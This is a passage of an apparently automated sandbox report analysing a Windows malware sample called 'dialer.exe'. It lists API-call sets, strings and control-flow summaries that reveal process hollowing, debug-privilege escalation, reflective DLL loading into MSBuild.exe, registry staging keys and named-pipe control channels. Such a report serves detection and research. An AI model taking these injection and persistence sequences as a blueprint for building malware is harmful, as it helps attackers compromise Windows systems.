                          • Associated: 00000033.00000002.2215827680.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                          • Associated: 00000033.00000002.2215906208.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                          • Associated: 00000033.00000002.2215945945.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_51_2_140000000_dialer.jbxd
                          Similarity
                          • API ID: Process$Resource$Security$CurrentDescriptorOpenToken$AdjustCloseConvertCreateErrorExitFindFreeHandleLastLoadLocalLockLookupPrivilegePrivilegesSizeofStringValue
                          • String ID:
                          • API String ID: 3836936051-0
                          • Opcode ID: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                          • Instruction ID: 542f07df19912b07f19d0c3647b83d0aa38d4f887fbb8c9b09a79fc57a6ac5cd
                          • Opcode Fuzzy Hash: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                          • Instruction Fuzzy Hash: 84A002B1F1794096FA0BB7F7785E3DC21656B9CB82F500415B242472B2DD3C44558716

                          Memory Dump Source
                          • Source File: 00000033.00000002.2215873737.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000033.00000002.2215827680.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                          • Associated: 00000033.00000002.2215906208.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                          • Associated: 00000033.00000002.2215945945.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_51_2_140000000_dialer.jbxd
                          Similarity
                          • API ID: Process$Open$File$CloseExitHandleHeapName$AllocDeleteEnumFindInformationModulePathProcessesQueryReadTokenValueWow64lstrlen
                          • String ID: SOFTWARE$dialerstager$open
                          • API String ID: 3276259517-3931493855
                          • Opcode ID: 3c799c4d4b717077f969037001029e391788172767dfb7e3a3364a0c1608c947
                          • Instruction ID: ae65b9042581f7dc9e2ee581e3d1b52dcddb088aa692a5b8ad70e1a65f9de3a1
                          • Opcode Fuzzy Hash: 3c799c4d4b717077f969037001029e391788172767dfb7e3a3364a0c1608c947
                          • Instruction Fuzzy Hash: 91D14DB13046818BEB7BDF26B8143E92269F74DBC8F404125BB4A47AB9DE78C605C741

                          Memory Dump Source
                          • Source File: 00000033.00000002.2215873737.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000033.00000002.2215827680.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                          • Associated: 00000033.00000002.2215906208.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                          • Associated: 00000033.00000002.2215945945.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_51_2_140000000_dialer.jbxd
                          Similarity
                          • API ID: Process$MemoryThreadWrite$AllocContextVirtual$CreateOpenResumeTerminate
                          • String ID: @
                          • API String ID: 3462610200-2766056989
                          • Opcode ID: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                          • Instruction ID: 5c16bc39e07cf5e776479c29415d8ab36f8b64b080a4e80c067f24e51f003d21
                          • Opcode Fuzzy Hash: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                          • Instruction Fuzzy Hash: B55122B2700A808AEB52CF66E8447DE77A5FB88BD8F054125EF4997B68DF38C855C700

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000033.00000002.2215873737.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000033.00000002.2215827680.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                          • Associated: 00000033.00000002.2215906208.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                          • Associated: 00000033.00000002.2215945945.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_51_2_140000000_dialer.jbxd
                          Similarity
                          • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                          • String ID: dialersvc64
                          • API String ID: 4184240511-3881820561
                          • Opcode ID: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                          • Instruction ID: f04b9e4fe08d72b668f3c34f73b3c63bb96ebc933f76805d9c48aa5d26f439e8
                          • Opcode Fuzzy Hash: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                          • Instruction Fuzzy Hash: 69415A72704A819AE712CF6AE8543DD73B5FB89B89F044125EF4E47A64DF38D149C300
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000033.00000002.2215873737.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000033.00000002.2215827680.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                          • Associated: 00000033.00000002.2215906208.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                          • Associated: 00000033.00000002.2215945945.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_51_2_140000000_dialer.jbxd
                          Similarity
                          • API ID: Delete$CloseEnumOpen
                          • String ID: SOFTWARE\dialerconfig
                          • API String ID: 3013565938-461861421
                          • Opcode ID: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                          • Instruction ID: 8f4ace04a6ff3505bb025a84b088d585f414f6eddbaae7ea6d4a7c6b6057ac94
                          • Opcode Fuzzy Hash: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                          • Instruction Fuzzy Hash: 2F1186B2714A8486E762CF26F8557E92378F78C7D8F404215A74D0BAA8DF7CC248CB54
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000033.00000002.2215873737.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000033.00000002.2215827680.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                          • Associated: 00000033.00000002.2215906208.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                          • Associated: 00000033.00000002.2215945945.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_51_2_140000000_dialer.jbxd
                          Similarity
                          • API ID: File$Write$CloseCreateHandle
                          • String ID: \\.\pipe\dialercontrol_redirect64
                          • API String ID: 148219782-3440882674
                          • Opcode ID: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                          • Instruction ID: c657f3a7a6ba8077c0f3fca19c98ae9a251d12aa6ce49f65425284bb78429f7a
                          • Opcode Fuzzy Hash: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                          • Instruction Fuzzy Hash: AE1139B6720B5082EB16CF16F818399A764F78DFE4F544215AB6907BA4CF78C549CB40
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000033.00000002.2215873737.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000033.00000002.2215827680.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                          • Associated: 00000033.00000002.2215906208.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                          • Associated: 00000033.00000002.2215945945.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_51_2_140000000_dialer.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: ntdll.dll
                          • API String ID: 1646373207-2227199552
                          • Opcode ID: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                          • Instruction ID: 7108e587e86fbdef38877cdd133235ae9a077454219746bc209a409130a8dfa8
                          • Opcode Fuzzy Hash: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                          • Instruction Fuzzy Hash: 5BD0C9F471260582EE1BDBA378643E552996B5CBC5F884020AE164B360DA38C1998600

                          Execution Graph

                          Execution Coverage:18.4%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:0%
                          Total number of Nodes:214
                          Total number of Limit Nodes:5

                          Callgraph

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000034.00000002.2189427707.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000034.00000002.2189357839.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                          • Associated: 00000034.00000002.2189457407.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                          • Associated: 00000034.00000002.2189497850.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_52_2_140000000_dialer.jbxd
                          Similarity
                          • API ID: CreateProcess$Close$CurrentHandleResource$FileSecurityThread$DescriptorFreeHeapModuleOpenProtectTokenValueVirtual$AdjustAllocConvertErrorFindInformationLastLibraryLoadLocalLockLookupMappingPrivilegePrivilegesSizeofSleepStringViewlstrcmpi
                          • String ID: D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$DLL$SOFTWARE\dialerconfig$SeDebugPrivilege$kernel32.dll$ntdll.dll$pid$svc64
                          • API String ID: 4177739653-1130149537
                          • Opcode ID: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                          • Instruction ID: c2e61514e361dd61edc66d1a85693de1d2c237bf329a5b31df93bef4cff25afe
                          • Opcode Fuzzy Hash: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                          • Instruction Fuzzy Hash: B781E4B6200B4196EB26CF62F8547D977A9F78CBD8F44512AEB4A43A78DF38C148C740

                          Control-flow Graph

                          APIs
                          Memory Dump Source
                          • Source File: 00000034.00000002.2189427707.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000034.00000002.2189357839.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                          • Associated: 00000034.00000002.2189457407.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                          • Associated: 00000034.00000002.2189497850.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_52_2_140000000_dialer.jbxd
                          Similarity
                          • API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
                          • String ID:
                          • API String ID: 4084875642-0
                          • Opcode ID: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                          • Instruction ID: 4858e5a3d965c592fcd1f5951e26bd94c88d4916acf90710a0b336d1aa1e032e
                          • Opcode Fuzzy Hash: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                          • Instruction Fuzzy Hash: E6519DB2711A819AEB66CF63E8587EA22A5F78DBC4F444025EF4947764DF38C545C700

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000034.00000002.2189427707.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000034.00000002.2189357839.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                          • Associated: 00000034.00000002.2189457407.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                          • Associated: 00000034.00000002.2189497850.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_52_2_140000000_dialer.jbxd
                          Similarity
                          • API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
                          • String ID: .text$C:\Windows\System32\
                          • API String ID: 2721474350-832442975
                          • Opcode ID: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                          • Instruction ID: 0b364bd3c89a37fdd3fa7b369e4888cbeb1e5b170dc00cf86e963973e9165d3d
                          • Opcode Fuzzy Hash: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                          • Instruction Fuzzy Hash: CC518BB2204B8096EB62CF16F8587DAB3A5F78CBD4F444525AF4A03B68DF38C549C700

                          Control-flow Graph

                          APIs
                          • GetProcessHeap.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001801
                          • HeapAlloc.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001812
                            • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000150B
                            • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000151E
                            • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000152C
                            • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000153D
                            • Part of subcall function 00000001400014D8: K32EnumProcesses.KERNEL32 ref: 0000000140001557
                            • Part of subcall function 00000001400014D8: OpenProcess.KERNEL32 ref: 0000000140001585
                            • Part of subcall function 00000001400014D8: K32EnumProcessModules.KERNEL32 ref: 00000001400015AA
                            • Part of subcall function 00000001400014D8: ReadProcessMemory.KERNELBASE ref: 00000001400015E1
                            • Part of subcall function 00000001400014D8: CloseHandle.KERNELBASE ref: 000000014000161D
                            • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000162F
                            • Part of subcall function 00000001400014D8: RtlFreeHeap.NTDLL ref: 000000014000163D
                            • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 0000000140001643
                            • Part of subcall function 00000001400014D8: HeapFree.KERNEL32 ref: 0000000140001651
                          • OpenProcess.KERNEL32 ref: 0000000140001859
                          • TerminateProcess.KERNEL32 ref: 000000014000186C
                          • CloseHandle.KERNEL32 ref: 0000000140001875
                          • GetProcessHeap.KERNEL32 ref: 0000000140001885
                          Memory Dump Source
                          • Source File: 00000034.00000002.2189427707.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000034.00000002.2189357839.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                          • Associated: 00000034.00000002.2189457407.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                          • Associated: 00000034.00000002.2189497850.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_52_2_140000000_dialer.jbxd
                          Similarity
                          • API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
                          • String ID:
                          • API String ID: 1323846700-0
                          • Opcode ID: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                          • Instruction ID: e8e8f15008253283e0d5a10c8ea57e573901c1344bffe788f1ea91b5e390c365
                          • Opcode Fuzzy Hash: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                          • Instruction Fuzzy Hash: C8115BB1B05A4186FB1ADF27F8443D966A6ABCDBC4F188038EF09037B5DE38C5868700

                          Control-flow Graph

                          APIs
                            • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000228F
                            • Part of subcall function 000000014000226C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000229F
                            • Part of subcall function 000000014000226C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 00000001400022B9
                            • Part of subcall function 000000014000226C: LookupPrivilegeValueW.ADVAPI32 ref: 00000001400022D0
                            • Part of subcall function 000000014000226C: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002308
                            • Part of subcall function 000000014000226C: GetLastError.KERNEL32 ref: 0000000140002312
                            • Part of subcall function 000000014000226C: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000231B
                            • Part of subcall function 000000014000226C: FindResourceExA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000232F
                            • Part of subcall function 000000014000226C: SizeofResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002346
                            • Part of subcall function 000000014000226C: LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000235F
                            • Part of subcall function 000000014000226C: LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002371
                            • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000237E
                            • Part of subcall function 000000014000226C: RegCreateKeyExW.ADVAPI32 ref: 00000001400023BE
                            • Part of subcall function 000000014000226C: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00000001400023E5
                            • Part of subcall function 000000014000226C: RegSetKeySecurity.ADVAPI32 ref: 00000001400023FE
                            • Part of subcall function 000000014000226C: LocalFree.KERNEL32 ref: 0000000140002408
                          • ExitProcess.KERNEL32 ref: 0000000140002263
                          Memory Dump Source
                          • Source File: 00000034.00000002.2189427707.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000034.00000002.2189357839.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                          • Associated: 00000034.00000002.2189457407.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                          • Associated: 00000034.00000002.2189497850.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_52_2_140000000_dialer.jbxd
                          Similarity
                          • API ID: Process$Resource$Security$CurrentDescriptorOpenToken$AdjustCloseConvertCreateErrorExitFindFreeHandleLastLoadLocalLockLookupPrivilegePrivilegesSizeofStringValue
                          • String ID:
                          • API String ID: 3836936051-0
                          • Opcode ID: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                          • Instruction ID: 542f07df19912b07f19d0c3647b83d0aa38d4f887fbb8c9b09a79fc57a6ac5cd
                          • Opcode Fuzzy Hash: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                          • Instruction Fuzzy Hash: 84A002B1F1794096FA0BB7F7785E3DC21656B9CB82F500415B242472B2DD3C44558716

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000034.00000002.2189427707.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000034.00000002.2189357839.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                          • Associated: 00000034.00000002.2189457407.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                          • Associated: 00000034.00000002.2189497850.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_52_2_140000000_dialer.jbxd
                          Similarity
                          • API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileLocalName$CodeCountErrorExitFindFreeLastMemoryModuleObjectPathQuerySingleThreadVirtualWaitWow64Writelstrlen
                          • String ID: @$MSBuild.exe$ReflectiveDllMain$dialer.exe
                          • API String ID: 2561231171-3753927220
                          • Opcode ID: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                          • Instruction ID: 2175fd9260984ecd3e092ef955109d5d50fbfcc0bf213717558b1eb8b1c9701c
                          • Opcode Fuzzy Hash: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                          • Instruction Fuzzy Hash: 40B138B260468186EB26DF27F8947E927A9FB8CBC4F404125AF4A477B4EF38C645C740

                          Control-flow Graph

                          Control-flow graph data for the function at 140002560-140002a8e (rendered graph not preserved). The entry block fans out through two comparison chains (140002592-1400025c0 and 14000273a-140002761) to the handlers below; almost every path ends in the common return block at 140002a74:
                          • 1400025cb: ReadFile; 140002602: call 1400018ac; 140002624: call 1400010c0
                          • 140002660: RegOpenKeyExW; 14000268d: RegDeleteValueW; 1400026a1: calls 1400019c4, 14000175c, 140001000, 1400017ec
                          • 1400026bd: ExitProcess
                          • 1400026c6: GetProcessHeap, HeapAlloc, K32EnumProcesses; 14000271b: call 1400010c0
                          • 14000276c: calls 14000217c and 1400021a8, then ExitProcess
                          • 14000279d: call 140001944; 1400027b4: ReadFile; 1400027e9: GetProcessHeap, HeapAlloc, ReadFile; 14000286f: call 140001c88; 140002881: lstrlenW, GetProcessHeap, HeapAlloc, call 140002a90, GetProcessHeap, HeapFree; 14000290b: GetProcessHeap
                          • 140002919, 140002932: call 140001944 (twice); 140002947: ShellExecuteW
                          • 140002974: call 14000175c
                          • 14000297e: ReadFile; 1400029b5: call 1400018ac; 1400029db: GetProcessHeap, HeapAlloc, call 1400014d8; 140002a44: call 1400016cc; 140002a49: GetProcessHeap; 140002a52: HeapFree; 140002a66: call 140002a90
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000034.00000002.2189427707.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000034.00000002.2189357839.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                          • Associated: 00000034.00000002.2189457407.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                          • Associated: 00000034.00000002.2189497850.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_52_2_140000000_dialer.jbxd
                          Similarity
                          • API ID: Process$Open$File$CloseExitHandleHeapName$AllocDeleteEnumFindInformationModulePathProcessesQueryReadTokenValueWow64lstrlen
                          • String ID: SOFTWARE$dialerstager$open
                          • API String ID: 3276259517-3931493855
                          • Opcode ID: ae79544a1ca264f77e0040c582fad8c70a14f3da5095032f2fa0f831f935a8fc
                          • Instruction ID: ae65b9042581f7dc9e2ee581e3d1b52dcddb088aa692a5b8ad70e1a65f9de3a1
                          • Opcode Fuzzy Hash: ae79544a1ca264f77e0040c582fad8c70a14f3da5095032f2fa0f831f935a8fc
                          • Instruction Fuzzy Hash: 91D14DB13046818BEB7BDF26B8143E92269F74DBC8F404125BB4A47AB9DE78C605C741

                          Control-flow Graph

                          Control-flow graph data for the function at 140001c88-140001ebf (rendered graph not preserved). Basic blocks and API calls in address order:
                          • 140001cce: CreateProcessW
                          • 140001d2b: VirtualAllocEx
                          • 140001d60: WriteProcessMemory
                          • 140001d8c: WriteProcessMemory (loop with 140001dc0)
                          • 140001dd2: VirtualAlloc
                          • 140001df1: GetThreadContext
                          • 140001e09: WriteProcessMemory
                          • 140001e30: SetThreadContext
                          • 140001e4e: ResumeThread
                          • 140001e62: OpenProcess; 140001e78: TerminateProcess (failure path entered from 140001e5d when any step above fails)
                          The blocks 140001cbb and 140001e8c wrap the whole sequence in a loop, so it can be run more than once before the function returns at 140001e97.
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000034.00000002.2189427707.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000034.00000002.2189357839.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                          • Associated: 00000034.00000002.2189457407.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                          • Associated: 00000034.00000002.2189497850.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_52_2_140000000_dialer.jbxd
                          Similarity
                          • API ID: Process$MemoryThreadWrite$AllocContextVirtual$CreateOpenResumeTerminate
                          • String ID: @
                          • API String ID: 3462610200-2766056989
                          • Opcode ID: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                          • Instruction ID: 5c16bc39e07cf5e776479c29415d8ab36f8b64b080a4e80c067f24e51f003d21
                          • Opcode Fuzzy Hash: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                          • Instruction Fuzzy Hash: B55122B2700A808AEB52CF66E8447DE77A5FB88BD8F054125EF4997B68DF38C855C700

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000034.00000002.2189427707.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000034.00000002.2189357839.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                          • Associated: 00000034.00000002.2189457407.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                          • Associated: 00000034.00000002.2189497850.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_52_2_140000000_dialer.jbxd
                          Similarity
                          • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                          • String ID: dialersvc64
                          • API String ID: 4184240511-3881820561
                          • Opcode ID: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                          • Instruction ID: f04b9e4fe08d72b668f3c34f73b3c63bb96ebc933f76805d9c48aa5d26f439e8
                          • Opcode Fuzzy Hash: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                          • Instruction Fuzzy Hash: 69415A72704A819AE712CF6AE8543DD73B5FB89B89F044125EF4E47A64DF38D149C300

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000034.00000002.2189427707.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000034.00000002.2189357839.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                          • Associated: 00000034.00000002.2189457407.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                          • Associated: 00000034.00000002.2189497850.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_52_2_140000000_dialer.jbxd
                          Similarity
                          • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                          • String ID: M$\\.\pipe\dialerchildproc64
                          • API String ID: 2203880229-3489460547
                          • Opcode ID: 180580de56f56ab00dd4d516fca46f959342e05f281243e0c5337f45e18aa23b
                          • Instruction ID: 6dc3dc8c0bd617ca7cbe615ebfcb02ed857a87361961821bc60a1768ee808972
                          • Opcode Fuzzy Hash: 180580de56f56ab00dd4d516fca46f959342e05f281243e0c5337f45e18aa23b
                          • Instruction Fuzzy Hash: C01139B1218A8492F716DB22F8047EE6764A78DBE0F444225BB66036F4DF7CC548C700

                          Control-flow Graph

                          Control-flow graph data for the function at 140001000-1400010be (rendered graph not preserved): RegOpenKeyExW at 140001000; one branch goes straight to RegDeleteKeyExW at 140001099, the other enters a loop of RegEnumKeyExW (14000104b) and RegDeleteKeyW (140001040) until enumeration ends, then RegCloseKey (140001093) before the same RegDeleteKeyExW.
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000034.00000002.2189427707.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000034.00000002.2189357839.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                          • Associated: 00000034.00000002.2189457407.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                          • Associated: 00000034.00000002.2189497850.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_52_2_140000000_dialer.jbxd
                          Similarity
                          • API ID: Delete$CloseEnumOpen
                          • String ID: SOFTWARE\dialerconfig
                          • API String ID: 3013565938-461861421
                          • Opcode ID: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                          • Instruction ID: 8f4ace04a6ff3505bb025a84b088d585f414f6eddbaae7ea6d4a7c6b6057ac94
                          • Opcode Fuzzy Hash: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                          • Instruction Fuzzy Hash: 2F1186B2714A8486E762CF26F8557E92378F78C7D8F404215A74D0BAA8DF7CC248CB54

                          Control-flow Graph

                          Control-flow graph data for the function at 1400021d0-140002255 (rendered graph not preserved): call 140001b54 at 1400021dd, retried after Sleep (1400021f2) until it succeeds; then a service loop of ConnectNamedPipe (1400021fd), ReadFile (14000220c), Sleep (140002241) and DisconnectNamedPipe (14000224c), which returns to ConnectNamedPipe.
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000034.00000002.2189427707.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000034.00000002.2189357839.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                          • Associated: 00000034.00000002.2189457407.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                          • Associated: 00000034.00000002.2189497850.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_52_2_140000000_dialer.jbxd
                          Similarity
                          • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                          • String ID: \\.\pipe\dialercontrol_redirect64
                          • API String ID: 2071455217-3440882674
